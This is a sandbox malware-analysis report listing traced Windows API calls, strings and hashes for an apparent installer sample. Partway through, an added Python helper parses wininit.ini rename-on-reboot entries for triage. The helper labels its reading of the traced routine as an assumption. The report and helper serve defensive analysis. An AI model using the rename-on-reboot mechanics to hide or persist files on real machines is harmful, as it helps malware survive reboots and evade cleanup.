                                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040503A
                                                                                    • DeleteObject.GDI32(00000000), ref: 0040503D
                                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405068
                                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405074
                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040510F
                                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040513F
                                                                                      • Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519
                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405153
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00405181
                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040518F
                                                                                    • ShowWindow.USER32(?,00000005), ref: 0040519F
                                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040529A
                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052FF
                                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405314
                                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405338
                                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405358
                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 0040536D
                                                                                    • GlobalFree.KERNEL32(?), ref: 0040537D
                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053F6
                                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 0040549F
                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004054AE
                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004054D9
                                                                                    • ShowWindow.USER32(?,00000000), ref: 00405527
                                                                                    • GetDlgItem.USER32(?,000003FE), ref: 00405532
                                                                                    • ShowWindow.USER32(00000000), ref: 00405539
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                    • String ID: $M$N
                                                                                    • API String ID: 2564846305-813528018
                                                                                    • Opcode ID: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
                                                                                    • Instruction ID: 91097811874ce85ba3cc7540bcf7dd58db25a3d6f071223140e4d1ec27d7ea12
                                                                                    • Opcode Fuzzy Hash: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
                                                                                    • Instruction Fuzzy Hash: 6C029C70900608AFDF20DF94DD85AAF7BB5FB85314F10817AE611BA2E1D7798A41CF58
                                                                                    APIs
                                                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404733
                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404747
                                                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404764
                                                                                    • GetSysColor.USER32(?), ref: 00404775
                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404783
                                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404791
                                                                                    • lstrlenW.KERNEL32(?), ref: 00404796
                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004047A3
                                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047B8
                                                                                    • GetDlgItem.USER32(?,0000040A), ref: 00404811
                                                                                    • SendMessageW.USER32(00000000), ref: 00404818
                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404843
                                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404886
                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00404894
                                                                                    • SetCursor.USER32(00000000), ref: 00404897
                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 004048B0
                                                                                    • SetCursor.USER32(00000000), ref: 004048B3
                                                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048E2
                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048F4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                    • String ID: : Completed$N
                                                                                    • API String ID: 3103080414-2140067464
                                                                                    • Opcode ID: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
                                                                                    • Instruction ID: 3ad42440e7936429012ccc374b67200ab01768f99e4ad58672f49272ac14a637
                                                                                    • Opcode Fuzzy Hash: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
                                                                                    • Instruction Fuzzy Hash: 2E6181B1900209BFDB10AF60DD85EAA7B69FB84315F00853AFA05B62D0C779A951DF98
                                                                                    APIs
                                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                    • DrawTextW.USER32(00000000,00433700,000000FF,00000010,00000820), ref: 00401156
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                    • String ID: F
                                                                                    • API String ID: 941294808-1304234792
                                                                                    • Opcode ID: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
                                                                                    • Instruction ID: eca0ad76d85821e0a7fbe67f508e5060b260b918cc65b70bf06bca200ae74670
                                                                                    • Opcode Fuzzy Hash: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
                                                                                    • Instruction Fuzzy Hash: 2F418B71800209AFCB058FA5DE459AFBFB9FF45314F00802EF591AA1A0C738EA54DFA4
                                                                                    APIs
                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406338,?,?), ref: 004061D8
                                                                                    • GetShortPathNameW.KERNEL32(?,00430108,00000400), ref: 004061E1
                                                                                      • Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
                                                                                      • Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE
                                                                                    • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061FE
                                                                                    • wsprintfA.USER32 ref: 0040621C
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00430908,C0000000,00000004,00430908,?,?,?,?,?), ref: 00406257
                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406266
                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040629E
                                                                                    • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,0042FD08,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062F4
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00406305
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040630C
                                                                                      • Part of subcall function 00406047: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\AM983ebb5F.exe,80000000,00000003), ref: 0040604B
                                                                                      • Part of subcall function 00406047: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                    • String ID: %ls=%ls$[Rename]
                                                                                    • API String ID: 2171350718-461813615
                                                                                    • Opcode ID: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
                                                                                    • Instruction ID: 2f157a22eecee44515c187ff3daf75b9e7e255f904fde787f0dd9ddf92a1116e
                                                                                    • Opcode Fuzzy Hash: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
                                                                                    • Instruction Fuzzy Hash: C9312271200315BBD2206B619D49F2B3A5CEF85718F16043EFD42FA2C2DB7D99258ABD
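The routine traced above (0x004061D8 to 0x0040630C) takes two paths through GetShortPathNameW, formats them with the `%ls=%ls` pattern, appends a `[Rename]` header and writes the result back into an existing file. That shape matches the legacy wininit.ini rename-on-reboot format, where each `dest=source` line under `[Rename]` is applied at the next boot and `NUL=path` means "delete path". The page does not name the file being written, so treating this function as a wininit.ini writer is an assumption of this example. The parser below is an added triage helper, not code from the report or from the sample; the INI text it runs on is constructed here in that format (short 8.3 paths, as GetShortPathNameW would produce), and the temp-directory markers used for flagging are this example's own heuristic.

```python
"""Triage helper: list pending rename-on-reboot operations from a wininit.ini-style
[Rename] section and flag the ones an analyst should look at first.

Added example, not code from the sandbox report or from the analysed sample.
Assumption: the `[Rename]` / `%ls=%ls` strings seen in the trace are this format.
"""
from dataclasses import dataclass
from typing import Iterable, List, Sequence


@dataclass(frozen=True)
class RenameOp:
    dest: str
    source: str

    @property
    def is_delete(self) -> bool:
        # `NUL=path` is the wininit.ini idiom for "delete path at next boot".
        return self.dest.upper() == "NUL"


def parse_rename_section(ini_text: str) -> List[RenameOp]:
    """Return every dest=source pair under [Rename], in file order.

    Hand-rolled rather than configparser: real [Rename] sections repeat the
    NUL key many times, and the dest is a path whose case must be preserved.
    """
    ops: List[RenameOp] = []
    in_rename = False
    for raw in ini_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_rename = line[1:-1].strip().lower() == "rename"
            continue
        if not in_rename or "=" not in line:
            continue
        dest, source = line.split("=", 1)  # the path may itself contain '='
        ops.append(RenameOp(dest.strip(), source.strip()))
    return ops


def suspicious_ops(ops: Iterable[RenameOp],
                   temp_markers: Sequence[str] = ("\\TEMP\\", "\\TMP\\")) -> List[RenameOp]:
    """Flag deletes and moves whose source lives in a temp directory.

    Both are what a dropper does to survive a reboot or to remove its own
    staging files; the marker list is a heuristic chosen for this example.
    """
    flagged: List[RenameOp] = []
    for op in ops:
        src_upper = op.source.upper()
        if op.is_delete or any(marker in src_upper for marker in temp_markers):
            flagged.append(op)
    return flagged


# Constructed sample input in the `[Rename]` + `dest=source` format, using the
# short (8.3) path form that GetShortPathNameW returns. Not taken from the sample.
SAMPLE_INI = """[Rename]
NUL=C:\\DOCUME~1\\user\\LOCALS~1\\Temp\\nsa1234.tmp
C:\\PROGRA~1\\App\\app.exe=C:\\DOCUME~1\\user\\LOCALS~1\\Temp\\nsb5678.tmp
[Other]
key=value
"""


def report(ini_text: str) -> List[str]:
    """Human-readable one-liners for each pending operation."""
    lines = []
    for op in parse_rename_section(ini_text):
        verb = "DELETE" if op.is_delete else "MOVE"
        target = op.source if op.is_delete else f"{op.source} -> {op.dest}"
        lines.append(f"{verb:6} {target}")
    return lines


if __name__ == "__main__":
    import sys

    text = open(sys.argv[1], encoding="mbcs" if sys.platform == "win32" else "latin-1").read() \
        if len(sys.argv) > 1 else SAMPLE_INI
    for line in report(text):
        print(line)
```

Run it against a wininit.ini pulled from the analysis image (or with no argument to use the constructed sample); any `DELETE` line or any move out of a temp directory is a file worth recovering before the machine is rebooted.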
                                                                                    APIs
                                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\AM983ebb5F.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
                                                                                    • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
                                                                                    • CharNextW.USER32(?,"C:\Users\user\Desktop\AM983ebb5F.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
                                                                                    • CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F
                                                                                    Strings
                                                                                    • *?|<>/":, xrefs: 00406857
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00406806
                                                                                    • "C:\Users\user\Desktop\AM983ebb5F.exe", xrefs: 00406849
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: Char$Next$Prev
                                                                                    • String ID: "C:\Users\user\Desktop\AM983ebb5F.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                    • API String ID: 589700163-3007628972
                                                                                    • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                                    • Instruction ID: fa9c0ef9ae643832d728fa0671e6943ea0b093c18f887e6db6f7fe1f852dcfd9
                                                                                    • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                                    • Instruction Fuzzy Hash: F111932780221299DB303B148C40E7766E8AF54794F52C43FED8A722C0F77C4C9286AD
                                                                                    APIs
                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 0040455A
                                                                                    • GetSysColor.USER32(00000000), ref: 00404598
                                                                                    • SetTextColor.GDI32(?,00000000), ref: 004045A4
                                                                                    • SetBkMode.GDI32(?,?), ref: 004045B0
                                                                                    • GetSysColor.USER32(?), ref: 004045C3
                                                                                    • SetBkColor.GDI32(?,?), ref: 004045D3
                                                                                    • DeleteObject.GDI32(?), ref: 004045ED
                                                                                    • CreateBrushIndirect.GDI32(?), ref: 004045F7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2320649405-0
                                                                                    • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                    • Instruction ID: 069c4eaec478219780f05c004fc5973679282d3c2eb16bc8cec9dcb23997e36d
                                                                                    • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                    • Instruction Fuzzy Hash: 592151B1500704ABCB20DF68DE08A5B7BF8AF41714B05892EEA96A22E0D739E944CF54
                                                                                    APIs
                                                                                    • ReadFile.KERNEL32(?,?,?,?), ref: 0040275D
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
                                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1
                                                                                      • Part of subcall function 00406128: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040613E
                                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                    • String ID: 9
                                                                                    • API String ID: 163830602-2366072709
                                                                                    • Opcode ID: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
                                                                                    • Instruction ID: e892b7cb172a86a35cdf2d5061c859a119b49b65f2ae0b0c69c9b35c58dd84de
                                                                                    • Opcode Fuzzy Hash: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
                                                                                    • Instruction Fuzzy Hash: F151FB75D0411AABDF24DFD4CA85AAEBBB9FF04344F10817BE901B62D0D7B49D828B58
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404EAC
                                                                                    • GetMessagePos.USER32 ref: 00404EB4
                                                                                    • ScreenToClient.USER32(?,?), ref: 00404ECE
                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EE0
                                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404F06
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$Send$ClientScreen
                                                                                    • String ID: f
                                                                                    • API String ID: 41195575-1993550816
                                                                                    • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                    • Instruction ID: eb967d7d92909976ed67768bbc6bf91133f1097352fa1b537f2083fc5134d3bd
                                                                                    • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                    • Instruction Fuzzy Hash: AB019E71900219BADB00DB94DD81FFEBBBCAF95710F10412BFB11B61C0C7B4AA018BA4
                                                                                    APIs
                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
                                                                                    • MulDiv.KERNEL32(000B2B20,00000064,000B2D24), ref: 00402FE1
                                                                                    • wsprintfW.USER32 ref: 00402FF1
                                                                                    • SetWindowTextW.USER32(?,?), ref: 00403001
                                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013
                                                                                    Strings
                                                                                    • verifying installer: %d%%, xrefs: 00402FEB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmp
